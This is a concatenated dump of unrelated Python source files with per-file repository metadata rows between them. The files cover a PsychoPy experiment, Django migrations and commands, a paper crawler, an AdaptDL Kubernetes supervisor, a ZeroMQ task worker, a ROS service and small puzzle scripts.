# -------Start Routine "thanks"-------
while continueRoutine:
# get current time
t = thanksClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
thankmesg1 = visual.TextStim(win, pos=[0,+35],units = 'pix')
thankmesg1.setText('This is the end of the experiment.')
thankmesg2 = visual.TextStim(win, pos=[0, 0], units = 'pix')
thankmesg2.setText('Thank you for your participation.')
thankmesg1.draw()
thankmesg2.draw()
win.flip()
event.waitKeys(keyList = ['n'])
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in thanksComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "thanks"-------
for thisComponent in thanksComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# the Routine "thanks" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
| 40.463974 | 211 | 0.595225 | 4,374 | 37,065 | 4.962963 | 0.130087 | 0.021605 | 0.013267 | 0.011609 | 0.742445 | 0.706652 | 0.672517 | 0.644325 | 0.61019 | 0.548738 | 0 | 0.021642 | 0.301875 | 37,065 | 915 | 212 | 40.508197 | 0.817282 | 0.298314 | 0 | 0.588034 | 0 | 0 | 0.076866 | 0.005751 | 0 | 0 | 0 | 0.001093 | 0 | 1 | 0 | false | 0 | 0.017094 | 0 | 0.017094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af500d453fe91b9945968c258744e395d10c0060 | 477 | py | Python | allmychanges/management/commands/update_package.py | AllMyChanges/allmychanges.com | 6729e9bddee8f76068737383d641ca3bc6e85422 | [
"BSD-2-Clause"
] | 46 | 2015-01-31T10:19:26.000Z | 2019-07-01T14:00:01.000Z | allmychanges/management/commands/update_package.py | AllMyChanges/allmychanges.com | 6729e9bddee8f76068737383d641ca3bc6e85422 | [
"BSD-2-Clause"
] | 59 | 2015-02-27T12:01:22.000Z | 2021-06-10T23:01:10.000Z | allmychanges/management/commands/update_package.py | AllMyChanges/allmychanges.com | 6729e9bddee8f76068737383d641ca3bc6e85422 | [
"BSD-2-Clause"
] | 11 | 2015-02-22T19:55:13.000Z | 2020-06-05T18:20:03.000Z | from django.core.management.base import BaseCommand
from twiggy_goodies.django import LogMixin
from allmychanges.models import Changelog
class Command(LogMixin, BaseCommand):
help = u"""Tests crawler on selected projects."""
def handle(self, *args, **options):
name = args[0]
changelog = Changelog.objects.filter(name=name)[0]
changelog.schedule_update(async=False,
full=len(args) > 1 and args[1] == 'full')
| 34.071429 | 75 | 0.66457 | 57 | 477 | 5.526316 | 0.684211 | 0.063492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.228512 | 477 | 13 | 76 | 36.692308 | 0.845109 | 0 | 0 | 0 | 0 | 0 | 0.081761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.3 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af5c49dd9107b197cbc087d8323c96cc2f598371 | 1,791 | py | Python | study/third_party_library/crawler/FindInterestedPaperVLDB2014.py | CheYulin/PythonStudy | 2b68a9cb2f7044d7e5ce9e7c971070eba7a36c07 | [
"MIT"
] | 3 | 2018-03-10T15:14:06.000Z | 2020-06-17T03:13:21.000Z | study/third_party_library/crawler/FindInterestedPaperVLDB2014.py | YcheLanguageStudio/PythonStudy | 2b68a9cb2f7044d7e5ce9e7c971070eba7a36c07 | [
"MIT"
] | null | null | null | study/third_party_library/crawler/FindInterestedPaperVLDB2014.py | YcheLanguageStudio/PythonStudy | 2b68a9cb2f7044d7e5ce9e7c971070eba7a36c07 | [
"MIT"
] | null | null | null | import urllib2
import gzip
import re
import sys
from StringIO import StringIO
from bs4 import BeautifulSoup
__author__ = 'cheyulin'
def loadData(url):
request = urllib2.Request(url)
request.add_header('Accept-encoding', 'gzip')
response = urllib2.urlopen(request)
print response.info().get('Content-Encoding')
if response.info().get('Content-Encoding') == 'gzip':
print 'response data is in gzip format.'
buf = StringIO(response.read())
f = gzip.GzipFile(fileobj=buf)
data = f.read()
else:
data = response.read()
return data
if __name__ == '__main__':
reload(sys)
i = 0;
sys.setdefaultencoding('utf-8')
path = r'/home/cheyulin/Documents/Paper/GraphInDB/vldb2013/'
page = loadData('http://www.vldb.org/pvldb/vol6.html')
# path = r'/home/cheyulin/Documents/Paper/GraphInDB/vldb2014/'
# page = loadData('http://www.vldb.org/pvldb/vol7.html')
# path = r'/home/cheyulin/Documents/Paper/GraphInDB/vldb2016/'
# page = loadData('http://www.vldb.org/pvldb/vol9.html')
soup = BeautifulSoup(page, from_encoding='utf-8')
paper_info = soup.find_all('a');
for paper in paper_info:
if re.match(r'.*http.*pdf.*', str(paper)):
paper_file_name = str(paper.string).strip().replace(' ', '_') + '.pdf'
if re.match('.*[Gg]raph.*', paper_file_name):
i += 1
paper_url = paper['href']
print "hi:" + str(paper).split('</a>')[0].split(' ')[2].strip()
print paper_file_name
print str(paper_url).strip()
f = urllib2.urlopen(paper_url)
with open(path + paper_file_name, 'wb') as output_stream:
output_stream.write(f.read())
print i
| 35.117647 | 82 | 0.606924 | 225 | 1,791 | 4.693333 | 0.4 | 0.030303 | 0.049242 | 0.048295 | 0.266098 | 0.20928 | 0.20928 | 0.083333 | 0 | 0 | 0 | 0.01909 | 0.239531 | 1,791 | 50 | 83 | 35.82 | 0.756241 | 0.128978 | 0 | 0 | 0 | 0 | 0.156913 | 0.032154 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.146341 | null | null | 0.146341 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af65e71e39ab34772c4075a9651096d9ecc33326 | 1,275 | py | Python | bookStore/users/migrations/0022_creditcard.py | afern247/BookStore-Web | bb914f9344ba7a92252973633da99a6b09054217 | [
"MIT"
] | null | null | null | bookStore/users/migrations/0022_creditcard.py | afern247/BookStore-Web | bb914f9344ba7a92252973633da99a6b09054217 | [
"MIT"
] | null | null | null | bookStore/users/migrations/0022_creditcard.py | afern247/BookStore-Web | bb914f9344ba7a92252973633da99a6b09054217 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-03-23 22:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0021_address_primaryaddress'),
]
operations = [
migrations.CreateModel(
name='CreditCard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('number', models.CharField(max_length=16, unique=True)),
('expdate_month', models.IntegerField(choices=[(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'), (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], default=1)),
('expdate_year', models.IntegerField(choices=[(2019, 2019), (2020, 2020), (2021, 2021), (2022, 2022), (2023, 2023), (2024, 2024), (2025, 2025), (2026, 2026), (2027, 2027), (2028, 2028)], default=2019)),
('securitycode', models.IntegerField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Profile')),
],
),
]
| 47.222222 | 261 | 0.580392 | 140 | 1,275 | 5.214286 | 0.642857 | 0.032877 | 0.038356 | 0.060274 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125633 | 0.225882 | 1,275 | 26 | 262 | 49.038462 | 0.613982 | 0.035294 | 0 | 0 | 1 | 0 | 0.149837 | 0.021987 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af694b73320e901f5929646929786a4800a51497 | 529 | py | Python | sw/migrations/0003_note.py | Nigar-mr/SwTechnices | a77835a0a5fa72f5cc76e1ef6c004173b10c03bc | [
"MIT"
] | null | null | null | sw/migrations/0003_note.py | Nigar-mr/SwTechnices | a77835a0a5fa72f5cc76e1ef6c004173b10c03bc | [
"MIT"
] | null | null | null | sw/migrations/0003_note.py | Nigar-mr/SwTechnices | a77835a0a5fa72f5cc76e1ef6c004173b10c03bc | [
"MIT"
] | null | null | null | # Generated by Django 2.2.7 on 2019-11-22 08:33
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sw', '0002_message_occupation'),
]
operations = [
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('note', ckeditor.fields.RichTextField()),
],
),
]
| 24.045455 | 114 | 0.586011 | 54 | 529 | 5.648148 | 0.740741 | 0.091803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050398 | 0.287335 | 529 | 21 | 115 | 25.190476 | 0.758621 | 0.085066 | 0 | 0 | 1 | 0 | 0.076763 | 0.047718 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af6d4a7039b51cca97e0de8ab8ff4d922402d030 | 1,219 | py | Python | task_widgets/calculation/numbers_calculation.py | athrn/kognitivo | 15822338778213c09ea654ec4e06a300129f9478 | [
"Apache-2.0"
] | 80 | 2017-11-13T21:58:55.000Z | 2022-01-03T20:10:42.000Z | task_widgets/calculation/numbers_calculation.py | athrn/kognitivo | 15822338778213c09ea654ec4e06a300129f9478 | [
"Apache-2.0"
] | null | null | null | task_widgets/calculation/numbers_calculation.py | athrn/kognitivo | 15822338778213c09ea654ec4e06a300129f9478 | [
"Apache-2.0"
] | 21 | 2017-11-14T09:47:41.000Z | 2021-11-23T06:44:31.000Z | import random
from task_widgets.task_base.intro_hint import IntroHint
from utils import import_kv
from .calculation import ModeOperandsCalculation
import_kv(__file__)
class IntroHintNumbersCalculation(IntroHint):
pass
class NumbersCalculation(ModeOperandsCalculation):
FROM = 101
TO = 899
TASK_KEY = "numbers_calculation"
INTRO_HINT_CLASS = IntroHintNumbersCalculation
def calculate_operands(self):
self.first = self.first or random.randint(self.FROM, self.TO - 100)
self.result = self.result or random.randint(self.first + 100, self.TO)
self.second = self.second or self.result - self.first
def build_text(self):
text = None
if self.mode == 0:
self.correct_answer = self.result
text = "%s + %s = ?" % (self.first, self.second)
if self.mode == 1:
self.correct_answer = self.first
text = "? + %s = %s" % (self.second, self.result)
if self.mode == 2:
self.correct_answer = self.second
text = "%s + ? = %s" % (self.first, self.result)
return text
def get_next_variant(self):
return self.correct_answer + 10 * random.randint(-10, +10)
| 28.348837 | 78 | 0.641509 | 149 | 1,219 | 5.107383 | 0.328859 | 0.082786 | 0.089356 | 0.082786 | 0.049934 | 0.049934 | 0 | 0 | 0 | 0 | 0 | 0.023153 | 0.255948 | 1,219 | 42 | 79 | 29.02381 | 0.815877 | 0 | 0 | 0 | 0 | 0 | 0.042658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.033333 | 0.166667 | 0.033333 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
af88d8896fe80a9f9654ff4b2d47da0592903018 | 4,026 | py | Python | sched/adaptdl_sched/supervisor.py | jessezbj/adaptdl | 21482877890ec1cb0b3608d2f1317f779eb8d085 | [
"Apache-2.0"
] | 294 | 2020-08-24T19:49:09.000Z | 2022-03-28T02:42:13.000Z | sched/adaptdl_sched/supervisor.py | jessezbj/adaptdl | 21482877890ec1cb0b3608d2f1317f779eb8d085 | [
"Apache-2.0"
] | 79 | 2020-09-01T00:44:25.000Z | 2022-03-23T07:52:22.000Z | sched/adaptdl_sched/supervisor.py | jessezbj/adaptdl | 21482877890ec1cb0b3608d2f1317f779eb8d085 | [
"Apache-2.0"
] | 41 | 2020-08-25T17:02:08.000Z | 2022-02-27T21:39:48.000Z | # Copyright 2020 Petuum, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kubernetes_asyncio as kubernetes
from aiohttp import web
import logging
from adaptdl.sched_hints import SCHED_HINTS
from adaptdl_sched.config import get_supervisor_port
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
class Supervisor:
"""
Supervisor provides a simple REST interface for several functionalities.
Currently, it has two endpoints:
1. /hints for jobs to send scheduling hints.
2. /discover for finding the pod IPs of a job.
"""
def __init__(self, port, host='0.0.0.0'):
self._host = host
self._port = port
self._core_api = kubernetes.client.CoreV1Api()
self._objs_api = kubernetes.client.CustomObjectsApi()
async def _handle_healthz(self, request):
# Health check.
return web.Response()
async def _handle_discover(self, request):
# Long-polling endpoint used for discovering pod IPs for a given job.
namespace = request.match_info["namespace"]
name = request.match_info["name"]
group = request.match_info["group"]
timeout = int(request.query.get("timeout", "30"))
pod_ip_list = None
async with kubernetes.watch.Watch() as w:
stream = w.stream(self._core_api.list_namespaced_pod, namespace,
label_selector="adaptdl/job={}".format(name),
field_selector="status.podIP!=",
timeout_seconds=timeout)
async for event in stream:
pod = event["object"]
replicas = int(pod.metadata.annotations["adaptdl/replicas"])
rank = int(pod.metadata.annotations["adaptdl/rank"])
if pod.metadata.annotations["adaptdl/group"] == group:
if pod_ip_list is None:
pod_ip_list = [None] * replicas
pod_ip_list[rank] = pod.status.pod_ip
if all(pod_ip is not None for pod_ip in pod_ip_list):
return web.json_response(pod_ip_list)
return web.json_response(status=408) # Timeout.
async def _handle_report(self, request):
namespace = request.match_info['namespace']
name = request.match_info['name']
hints = await request.json()
# Drop all unrecognized fields. TODO: validate each client-sent field.
hints = {k: hints[k] for k in SCHED_HINTS if k in hints}
# Patch only the train field to avoid conflicts with controller.
patch = {"status": {"train": hints}}
LOG.info("Patch AdaptDLJob %s/%s: %s", namespace, name, patch)
await self._objs_api.patch_namespaced_custom_object_status(
"adaptdl.petuum.com", "v1", namespace, "adaptdljobs", name, patch)
return web.Response()
def run(self):
self.app = web.Application()
self.app.add_routes([
web.get('/healthz', self._handle_healthz),
web.get('/discover/{namespace}/{name}/{group}',
self._handle_discover),
web.put('/hints/{namespace}/{name}', self._handle_report),
])
LOG.info("%s %s", self._host, self._port)
web.run_app(self.app, host=self._host, port=self._port)
if __name__ == "__main__":
logging.basicConfig()
kubernetes.config.load_incluster_config()
supervisor = Supervisor(get_supervisor_port())
supervisor.run()
| 40.26 | 78 | 0.642077 | 506 | 4,026 | 4.938735 | 0.379447 | 0.018007 | 0.021609 | 0.034814 | 0.096038 | 0.070428 | 0.070428 | 0.046419 | 0.046419 | 0.046419 | 0 | 0.007026 | 0.257576 | 4,026 | 99 | 79 | 40.666667 | 0.82904 | 0.247144 | 0 | 0.032258 | 0 | 0 | 0.091092 | 0.020429 | 0 | 0 | 0 | 0.010101 | 0 | 1 | 0.032258 | false | 0 | 0.080645 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af8bfbc4d47aab875b9630049b677aba7e677060 | 703 | py | Python | questions/scripts/update_question_count_of_chapters.py | nyctophiliacme/edtech-backend | 71f65b379d03d04fad1ea2b1a16a5a3be9bdd938 | [
"MIT"
] | null | null | null | questions/scripts/update_question_count_of_chapters.py | nyctophiliacme/edtech-backend | 71f65b379d03d04fad1ea2b1a16a5a3be9bdd938 | [
"MIT"
] | null | null | null | questions/scripts/update_question_count_of_chapters.py | nyctophiliacme/edtech-backend | 71f65b379d03d04fad1ea2b1a16a5a3be9bdd938 | [
"MIT"
] | null | null | null | import django
import os
import sys
sys.path.append("/home/ubuntu/edtech-backend")
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'superteacher.settings')
django.setup()
from exams.models import Exam
from subjects.models import Subject
from chapters.models import Chapter
from questions.models import QuestionChapterMapping
if __name__ == '__main__':
exam = Exam.objects.get(exam_code=sys.argv[1])
subjects = Subject.objects.filter(exam=exam)
for subject in subjects:
chapters = Chapter.objects.filter(subject=subject)
for chapter in chapters:
chapter.question_count = QuestionChapterMapping.objects.filter(chapter=chapter).count()
chapter.save()
| 30.565217 | 99 | 0.751067 | 86 | 703 | 6 | 0.465116 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001678 | 0.152205 | 703 | 22 | 100 | 31.954545 | 0.864094 | 0 | 0 | 0 | 0 | 0 | 0.110953 | 0.099573 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.388889 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
af8c318c25e681dcaae6ae6cba4be68036fd789b | 1,599 | py | Python | services/homesec/homesec.py | kstillson/ktools | 99690e5a40a0b94545e766efddfd2e39ff8cc78e | [
"MIT"
] | null | null | null | services/homesec/homesec.py | kstillson/ktools | 99690e5a40a0b94545e766efddfd2e39ff8cc78e | [
"MIT"
] | null | null | null | services/homesec/homesec.py | kstillson/ktools | 99690e5a40a0b94545e766efddfd2e39ff8cc78e | [
"MIT"
] | null | null | null | #!/usr/bin/python3
'''TODO: doc
'''
import argparse, os, sys
import view
import kcore.common as C
import kcore.webserver as W
WEB_HANDLERS = {
'/$': view.root_view,
'/easy': view.easy_view,
'/healthz': view.healthz_view,
'/static.*': view.static_view,
'/status': view.status_view,
'/statusz': view.statusz_view,
'/touchz': view.touchz_view,
'/trigger.*': view.trigger_view,
}
# ---------- main
def parse_args(argv):
ap = argparse.ArgumentParser(description='home automation web server')
ap.add_argument('--debug', '-d', action='store_true', help='debug mode; log to stdout, disable all external comm')
ap.add_argument('--logfile', '-l', default='homesec.log', help='filename for operations log. "-" for stdout, blank to disable log file')
ap.add_argument('--port', '-p', type=int, default=8080, help='port to listen on')
ap.add_argument('--syslog', '-s', action='store_true', help='sent alert level log messages to syslog')
return ap.parse_args(argv)
def main(argv=[]):
args = parse_args(argv or sys.argv[1:])
C.init_log('homesec', '-' if args.debug else args.logfile,
filter_level_logfile=C.DEBUG if args.debug else C.INFO,
filter_level_syslog=C.CRITICAL if args.syslog else C.NEVER)
if args.debug:
import ext
ext.DEBUG = True
view.DEBUG = True
C.log_warning('** DEBUG MODE ACTIVATED **')
ws = W.WebServer(WEB_HANDLERS, wrap_handlers=not args.debug)
ws.start(port=args.port, background=False) # Doesn't return.
if __name__ == '__main__':
sys.exit(main())
| 30.169811 | 139 | 0.657286 | 226 | 1,599 | 4.5 | 0.433628 | 0.019666 | 0.051131 | 0.037365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004591 | 0.182614 | 1,599 | 52 | 140 | 30.75 | 0.773527 | 0.036898 | 0 | 0 | 0 | 0 | 0.242978 | 0 | 0 | 0 | 0 | 0.019231 | 0 | 1 | 0.057143 | false | 0 | 0.142857 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af91a12ebe5083f2cf235e0116338c74e0aeaed6 | 377 | py | Python | scheduler/templatetags/custom_filters.py | MarynaSavchenko/zielbruks | ccebd84adaa71fe5b9735747c8c684ab7e0cbc8e | [
"MIT"
] | null | null | null | scheduler/templatetags/custom_filters.py | MarynaSavchenko/zielbruks | ccebd84adaa71fe5b9735747c8c684ab7e0cbc8e | [
"MIT"
] | 9 | 2019-04-01T21:52:12.000Z | 2019-06-11T17:31:10.000Z | scheduler/templatetags/custom_filters.py | MarynaSavchenko/zielbruks | ccebd84adaa71fe5b9735747c8c684ab7e0cbc8e | [
"MIT"
] | 2 | 2019-03-31T16:23:04.000Z | 2019-06-15T22:14:41.000Z | """module for custom template tags"""
from django import template
register = template.Library()
@register.simple_tag
def get_color_tag(counter):
"""returns color tag based on parity of the counter"""
if counter % 2 == 0:
return 'warning'
return 'info'
@register.simple_tag
def get_danger_tag():
"""returns color tag 'danger'"""
return 'danger'
| 19.842105 | 58 | 0.681698 | 50 | 377 | 5.02 | 0.58 | 0.095618 | 0.135458 | 0.159363 | 0.183267 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006645 | 0.201592 | 377 | 18 | 59 | 20.944444 | 0.827243 | 0.28382 | 0 | 0.2 | 0 | 0 | 0.066929 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
af997d86b84297ca9d63b60be310ee0b4083bbef | 241 | py | Python | problem5.py | andersontenorio/projecteuler | e6828c02e2e905568ec2c8ff94acb063303074f4 | [
"MIT"
] | null | null | null | problem5.py | andersontenorio/projecteuler | e6828c02e2e905568ec2c8ff94acb063303074f4 | [
"MIT"
] | null | null | null | problem5.py | andersontenorio/projecteuler | e6828c02e2e905568ec2c8ff94acb063303074f4 | [
"MIT"
] | null | null | null | n = 0
factor = 20
while True:
n = n + factor
is_divisible = True
for i in range(1, factor + 1):
if n % i != 0:
is_divisible = False
break
if (is_divisible):
break
print(n)
| 17.214286 | 42 | 0.473029 | 33 | 241 | 3.363636 | 0.515152 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044444 | 0.439834 | 241 | 13 | 43 | 18.538462 | 0.777778 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afa4bdb48572500308077fd97c941de2d87fc5a4 | 443 | py | Python | babytracker/events/models.py | graupv/BabyTracker | 46db17abc3817bf1b88efe4cd16a45843fe78f95 | [
"MIT"
] | null | null | null | babytracker/events/models.py | graupv/BabyTracker | 46db17abc3817bf1b88efe4cd16a45843fe78f95 | [
"MIT"
] | null | null | null | babytracker/events/models.py | graupv/BabyTracker | 46db17abc3817bf1b88efe4cd16a45843fe78f95 | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.timezone import now
class Event(models.Model):
datetime = models.DateTimeField(default = now)
description = models.CharField(max_length = 200, null = False)
baby = models.ForeignKey(
'babies.Baby',
on_delete = models.SET_NULL,
null = True,
blank = False
)
def __str__(self):
return f'Event\'s Baby: {self.baby}, date:{self.datetime})' | 29.533333 | 67 | 0.650113 | 55 | 443 | 5.109091 | 0.654545 | 0.071174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008876 | 0.23702 | 443 | 15 | 67 | 29.533333 | 0.822485 | 0 | 0 | 0 | 0 | 0 | 0.038288 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0.076923 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
afa519ef4f83aa049def19f381594b951d04f274 | 921 | py | Python | zerotask/worker.py | Alex-CodeLab/zerotask | 708b4cf803eb9eda8a7b2cdb76a88caaa71c3012 | [
"MIT"
] | 1 | 2020-06-08T00:02:19.000Z | 2020-06-08T00:02:19.000Z | zerotask/worker.py | Alex-CodeLab/zerotask | 708b4cf803eb9eda8a7b2cdb76a88caaa71c3012 | [
"MIT"
] | null | null | null | zerotask/worker.py | Alex-CodeLab/zerotask | 708b4cf803eb9eda8a7b2cdb76a88caaa71c3012 | [
"MIT"
] | null | null | null | import ast
import json
import os
import signal
import sys
import zmq
from tasks import *
context = zmq.Context()
receiver = context.socket(zmq.PULL)
receiver.bind('tcp://127.0.0.1:5588')
# Socket to send messages to
sender = context.socket(zmq.PUSH)
sender.connect("tcp://127.0.0.1:5589")
# todo: clean kill- wait until all processes are finished
def signal_handler(signum, frame):
signal.signal(signum, signal.SIG_IGN) # ignore additional signals
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
while True:
msg = receiver.recv()
queue, tid, func, arg, kwarg = msg.split(b' ', maxsplit=4)
arg= tuple(arg.decode().split(','))
kwargs= ast.literal_eval(kwarg.decode())
sender.send(tid+ b' 1') # status running
result = getattr(Tasks, func.decode())(*arg, **kwargs)
sender.send(tid + b' 2') # status completed
| 26.314286 | 69 | 0.67101 | 131 | 921 | 4.625954 | 0.557252 | 0.059406 | 0.052805 | 0.026403 | 0.029703 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032129 | 0.188925 | 921 | 34 | 70 | 27.088235 | 0.779116 | 0.152009 | 0 | 0 | 0 | 0 | 0.069677 | 0 | 0 | 0 | 0 | 0.029412 | 0 | 1 | 0.04 | false | 0 | 0.28 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afaecf270b0012749d2bfc7693fa3750c22d2cee | 393 | py | Python | test/test_server.py | mgrrx/aioros | 9bd750020d0d5fb466891346f61b6f083cbb8f05 | [
"Apache-2.0"
] | 8 | 2020-08-27T17:16:59.000Z | 2022-02-02T13:39:41.000Z | test/test_server.py | mgrrx/aioros | 9bd750020d0d5fb466891346f61b6f083cbb8f05 | [
"Apache-2.0"
] | 3 | 2022-02-09T19:18:12.000Z | 2022-03-08T21:12:00.000Z | test/test_server.py | mgrrx/aioros | 9bd750020d0d5fb466891346f61b6f083cbb8f05 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import aioros
from rospy_tutorials.srv import AddTwoInts
from rospy_tutorials.srv import AddTwoIntsResponse
async def setup(nh: aioros.NodeHandle):
await nh.create_service(
'add_two_ints',
AddTwoInts,
lambda request: AddTwoIntsResponse(request.a + request.b))
if __name__ == '__main__':
aioros.run_forever(setup, 'add_two_ints_server')
